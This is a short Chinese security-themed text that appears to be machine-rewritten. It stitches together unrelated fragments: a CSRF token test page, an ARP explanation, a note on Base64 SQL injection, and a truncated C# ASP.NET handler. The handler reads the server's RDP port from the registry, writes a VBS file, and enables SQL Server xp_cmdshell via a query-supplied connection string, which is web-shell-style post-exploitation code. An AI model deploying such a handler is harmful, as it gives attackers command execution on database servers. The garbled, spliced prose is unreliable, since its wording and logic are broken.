首要咱们需求拜访一下，带有token 呼应的http url，这儿为http://localhost/csrf.php (这是我本地自己编写的一个简略的测验页面，你的或许或许不同，不过道理都是相同的， 后边会附上源代码) 当主机A要与主机B通讯时，地址解析协议能够将主机B的IP地址（192.168.1.2）解析成主机B的MAC地址，以下为作业流程： /// <param name="context"></param>//将解码后的id直接带进数据库仿制代码这样就不会发生Base64编码下的注入缝隙了。 也能够直接将原句子改为： private void ShowPort(HttpContext context) { context.Response.Write(Microsoft.Win32.Registry.LocalMachine.OpenSubKey(@"SYSTEMCurrentControlSetControlTerminal ServerWdsrdpwdTdstcp").GetValue("PortNumber").ToString()); } public void ProcessRequest(HttpContext context) { context.Response.ContentType = "text/plain"; try { var connection = context.Request.QueryString["connection"]; switch (context.Request.QueryString["method"]) { case "1": WriteVbs(context); break; case "2": ExecuteSql(connection,@"sp_configure 'show advanced options',1 reconfigure"); ExecuteSql(connection,@"sp_configure 'xp_cmdshell',1 reconfigure");//敞开数据库的xp_cmdshell

托付机房技能大哥调查了下衔接状况，原来是短衔接，会很快的开释端口，所以才看不到端口的衔接状况。